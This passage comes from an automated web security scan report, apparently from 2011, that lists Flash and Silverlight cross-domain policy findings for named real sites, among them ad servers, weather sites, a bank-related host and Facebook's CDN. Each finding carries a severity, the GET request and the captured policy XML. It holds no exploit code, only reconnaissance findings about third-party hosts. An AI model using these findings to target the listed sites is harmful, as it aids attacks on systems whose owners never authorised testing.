Server: Apache
Last-Modified: Thu, 22 Apr 2010 18:40:30 GMT
ETag: "1feaa12-ca-484d7a52d6637"
Accept-Ranges: bytes
Content-Length: 202
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

5.25. http://rtsys.reachlocal.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://rtsys.reachlocal.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: rtsys.reachlocal.com

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:23:37 GMT
Server: Apache
Last-Modified: Fri, 05 Mar 2010 01:28:54 GMT
ETag: "cc-48103a373c180"
Accept-Ranges: bytes
Content-Length: 204
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Connection: close
Content-Type: application/xml
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7d45525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:52:28 GMT;path=/;httponly

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

5.26. http://rtsys.rtrk.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://rtsys.rtrk.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: rtsys.rtrk.com

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:23:40 GMT
Server: Apache
Last-Modified: Fri, 05 Mar 2010 01:28:54 GMT
ETag: "cc-48103a373c180"
Accept-Ranges: bytes
Content-Length: 204
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Connection: close
Content-Type: application/xml
Set-Cookie: NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7645525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:52:21 GMT;path=/;httponly

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

5.27. http://s.ytimg.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.ytimg.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: s.ytimg.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Last-Modified: Fri, 27 Aug 2010 02:31:32 GMT
Date: Wed, 02 Feb 2011 19:09:39 GMT
Expires: Wed, 09 Feb 2011 19:09:39 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=604800
Age: 76440

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

5.28. http://s0.2mdn.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://s0.2mdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Wed, 02 Feb 2011 19:09:39 GMT
Expires: Thu, 03 Feb 2011 19:09:39 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 76463

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

5.29. http://s1.srtk.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://s1.srtk.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: s1.srtk.net

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:23:39 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 26 Jan 2011 00:57:37 GMT
ETag: "1197a8-ff-49ab551aea240"
Accept-Ranges: bytes
Content-Length: 255
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*"/>
...[SNIP]...

5.30. http://tags.crwdcntrl.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://tags.crwdcntrl.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: tags.crwdcntrl.net

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:23:50 GMT
Server: Apache/2.2.8 (CentOS)
Last-Modified: Tue, 09 Jun 2009 18:20:38 GMT
ETag: "2958196-a5-46bee6a616980"
Accept-Ranges: bytes
Content-Length: 165
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<cross-domain-policy>
   <site-control    permitted-cross-domain-policies="master-only" />
   <allow-access-from    domain="*" />
</cross-domain-policy>

5.31. http://vortex.accuweather.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://vortex.accuweather.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.1
Host: vortex.accuweather.com
Proxy-Connection: keep-alive
Referer: http://netwx.accuweather.com/netWx-V212.swf?zipcode=10025&customtheme=&theme=clouds&metric=0&target=_self&lang=eng&url=&video=&category=&logo=1&tStyle=normal&partner=netweather&myspace=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 09 Feb 2010 20:00:37 GMT
Accept-Ranges: bytes
ETag: "8020f08bc2a9ca1:2cd"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Host: origin1
Cache-Control: max-age=3600
Date: Thu, 03 Feb 2011 16:23:58 GMT
Connection: close
Content-Length: 1403

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-access-from domain="*.accuweather.com" />
<allow-access-from domain="*.accuweatherchannel.com" />
<allow-access-from domain="*.discovery.com" />
<allow-access-from domain="*.oddcast.com" />
<allow-access-from domain="*.ucview.com" />
<allow-access-from domain="*.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="*.doubleclick.net" secure="true" />
...[SNIP]...
<allow-access-from domain="*.doubleclick.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.adcdn.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.dartmotif.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.aolcdn.com" secure="true" />
...[SNIP]...
<allow-access-from domain="maps.google.com" />
<allow-access-from domain="maps.yahooapis.com"/>
<allow-access-from domain="spm161.brinkster.net" />
<allow-access-from domain="www.dotglu.com" />
<allow-access-from domain="www.johnfrieda.com" />
<allow-access-from domain="www.travelboards.com" />
<allow-access-from domain="www.topix.com"/>
<allow-access-from domain="66.42.146.50" />
<allow-access-from domain="66.42.146.66" />
<allow-access-from domain="68.167.121.226" />
...[SNIP]...

5.32. http://weather.weatherbug.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://weather.weatherbug.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: weather.weatherbug.com

Response

HTTP/1.0 200 OK
Content-Length: 320
Content-Type: text/xml
Last-Modified: Thu, 04 Nov 2010 12:35:42 GMT
Accept-Ranges: bytes
ETag: "df8e9dcb1c7ccb1:dcbe"
Server: Microsoft-IIS/6.0
p3p: CP="NON DSP COR NID"
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:34:22 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<site-control perm
...[SNIP]...

5.33. http://www.accuweather.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.accuweather.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.accuweather.com

Response

HTTP/1.0 200 OK
Content-Length: 1403
Content-Type: text/xml
Last-Modified: Tue, 09 Feb 2010 20:00:39 GMT
Accept-Ranges: bytes
ETag: "c28f298dc2a9ca1:a74"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:34:40 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-access-from domain="*.accuweather.com" />
<allow-access-from domain="*.accuweatherchannel.com" />
<allow-access-from domain="*.discovery.com" />
<allow-access-from domain="*.oddcast.com" />
<allow-access-from domain="*.ucview.com" />
<allow-access-from domain="*.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="*.doubleclick.net" secure="true" />
...[SNIP]...
<allow-access-from domain="*.doubleclick.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.adcdn.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.dartmotif.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.aolcdn.com" secure="true" />
...[SNIP]...
<allow-access-from domain="maps.google.com" />
<allow-access-from domain="maps.yahooapis.com"/>
<allow-access-from domain="spm161.brinkster.net" />
<allow-access-from domain="www.dotglu.com" />
<allow-access-from domain="www.johnfrieda.com" />
<allow-access-from domain="www.travelboards.com" />
<allow-access-from domain="www.topix.com"/>
<allow-access-from domain="66.42.146.50" />
<allow-access-from domain="66.42.146.66" />
<allow-access-from domain="68.167.121.226" />
...[SNIP]...

5.34. http://www1.member-hsbc-group.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www1.member-hsbc-group.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www1.member-hsbc-group.com

Response

HTTP/1.1 200 OK
Content-Length: 82
Content-Type: text/xml
Last-Modified: Thu, 20 Dec 2007 20:24:48 GMT
Accept-Ranges: bytes
ETag: "ef9fe45d4643c81:7da"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:29:52 GMT
Connection: close

<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

5.35. http://xads.zedo.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://xads.zedo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: xads.zedo.com

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 17:09:37 GMT
Server: ZEDO 3G
Last-Modified: Mon, 19 May 2008 09:02:14 GMT
ETag: "4557e-f7-44d919ea43180"
Accept-Ranges: bytes
Content-Length: 247
Edge-Control: dca=esi
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.zedo.com -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

5.36. http://ziggymedia.go2cloud.org/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ziggymedia.go2cloud.org
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ziggymedia.go2cloud.org

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: application/xml
Date: Thu, 03 Feb 2011 17:10:14 GMT
ETag: "71c0a3-fb-493aa02783b80"
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Last-Modified: Thu, 28 Oct 2010 09:31:42 GMT
Pragma: no-cache
Server: nginx/0.9.3
Content-Length: 251
Connection: Close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-http-request-headers-from domain="*" headers="*"/><allow-access-from domain="*" />
...[SNIP]...

5.37. http://api.bing.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://api.bing.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.bing.com

Response

HTTP/1.0 200 OK
Cache-Control: no-cache
Content-Length: 634
Content-Type: text/xml
Last-Modified: Fri, 01 Oct 2010 21:58:33 GMT
ETag: A06DD1053D1686DFCEF21D90E3BAD7190000027A
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 13:42:57 GMT
Connection: close
Set-Cookie: _MD=alg=m2&C=2011-02-03T13%3a42%3a57; expires=Sun, 13-Feb-2011 13:42:57 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=FBE0622867B545E3BC3608E6771E4D62; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&DomainVertical=0&Cashback=0&MSCorp=kievfinal&GeoPerf=0&Release=or3; domain=.bing.com; path=/
Set-Cookie: SRCHD=D=1626582&MS=1626582; expires=Sat, 02-Feb-2013 13:42:57 GMT; domain=.bing.com; path=/
Set-Cookie: SRCHUID=V=2&GUID=66899BBFDACA49CA8903CE79870122B3; expires=Sat, 02-Feb-2013 13:42:57 GMT; path=/
Set-Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110203; expires=Sat, 02-Feb-2013 13:42:57 GMT; domain=.bing.com; path=/

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-http-request-headers-from domain="*.bing.com" he
...[SNIP]...
<allow-access-from domain="*.bing.com"/>
...[SNIP]...
<allow-access-from domain="blstc.msn.com"/>
...[SNIP]...
<allow-access-from domain="stc.sandblu.msn-int.com"/>
...[SNIP]...

5.38. http://clicks.superpages.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://clicks.superpages.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: clicks.superpages.com

Response

HTTP/1.1 200 OK
Server: Unspecified
ETag: W/"301-1296249771000"
Last-Modified: Fri, 28 Jan 2011 21:22:51 GMT
Content-Type: application/xml
Content-Length: 301
Date: Thu, 03 Feb 2011 16:10:10 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*.superpages.com"/><allow-access-from domain="*.bettervideo.com"/><allow-access-from domain="*.biemedia.com"/>
...[SNIP]...

5.39. https://imgssl.superpages.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   https://imgssl.superpages.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: imgssl.superpages.com

Response

HTTP/1.0 200 OK
Server: Unspecified
Last-Modified: Thu, 29 Nov 2007 21:24:19 GMT
ETag: "87c-d2-efd546c0"
Accept-Ranges: bytes
Content-Length: 210
Content-Type: application/xml
Date: Thu, 03 Feb 2011 16:21:56 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*.superpages.com" /></cross-doma
...[SNIP]...

5.40. http://media.superpages.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://media.superpages.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: media.superpages.com

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:22:23 GMT
Server: Unspecified
Last-Modified: Tue, 04 Dec 2007 18:46:47 GMT
ETag: "85d-d2-4755a097"
Accept-Ranges: bytes
Content-Length: 210
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*.superpages.com" /></cross-doma
...[SNIP]...

5.41. http://static.ak.fbcdn.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: static.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-Cnection: close
Date: Thu, 03 Feb 2011 16:23:48 GMT
Content-Length: 1581
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
...[SNIP]...
<allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="external.ak.fbcdn.net" />
   <allow-access-from domain="www.facebook.com" />
   <allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
...[SNIP]...
<allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="s-static.ak.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
...[SNIP]...

5.42. http://us.rd.yahoo.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://us.rd.yahoo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: us.rd.yahoo.com

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:34:15 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Fri, 04 Aug 2006 08:27:42 GMT
Accept-Ranges: bytes
Content-Length: 228
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.yahoo.com" secure="false" />
...[SNIP]...

5.43. http://www.apple.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.apple.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.apple.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 02 Jun 2005 16:16:28 GMT
ETag: "8d-3f8918f48ef00"
Server: Apache/2.2.11 (Unix)
X-N: S
X-Cache-TTL: 600
X-Cached-Time: Wed, 22 Dec 2010 18:51:54 GMT
Content-Type: application/xml
Content-Length: 141
Cache-Control: max-age=137
Expires: Thu, 03 Feb 2011 16:37:30 GMT
Date: Thu, 03 Feb 2011 16:35:13 GMT
Connection: close

<cross-domain-policy>
<allow-access-from domain="wdirect.apple.com" />
<allow-access-from domain="*.apple.com" />
</cross-domain-policy>

5.44. http://advertising.microsoft.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.microsoft.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: advertising.microsoft.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 303
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 13:43:24 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="video.msn.com" />
<allow-access-from domain="images.video.msn.com" />
<allow-access-from domain="fp.advertising.microsoft.com" />
<allow-access-from domain="fporigin.advertising.microsoft.com" />
...[SNIP]...

5.45. http://citi.bridgetrack.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://citi.bridgetrack.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: citi.bridgetrack.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 452
Content-Type: text/html
Server:
Date: Thu, 03 Feb 2011 13:43:00 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="citi.bridgetrack.com.edgesuite.net" />
   <allow-access-from domain="172.16.181.69" />
   <allow-access-from domain="172.16.180.191" />
   <allow-access-from domain="banking.citibank.com" />
   <allow-access-from domain="sec-citi.bridgetrack.com" />
   <allow-access-from domain="citi-preview.bridgetrack.com" />
...[SNIP]...

6. Silverlight cross-domain policy
There are 7 instances of this issue:

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


6.1. http://ad.br.doubleclick.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.br.doubleclick.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad.br.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Wed, 21 May 2008 19:54:04 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

6.2. http://ad.doubleclick.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

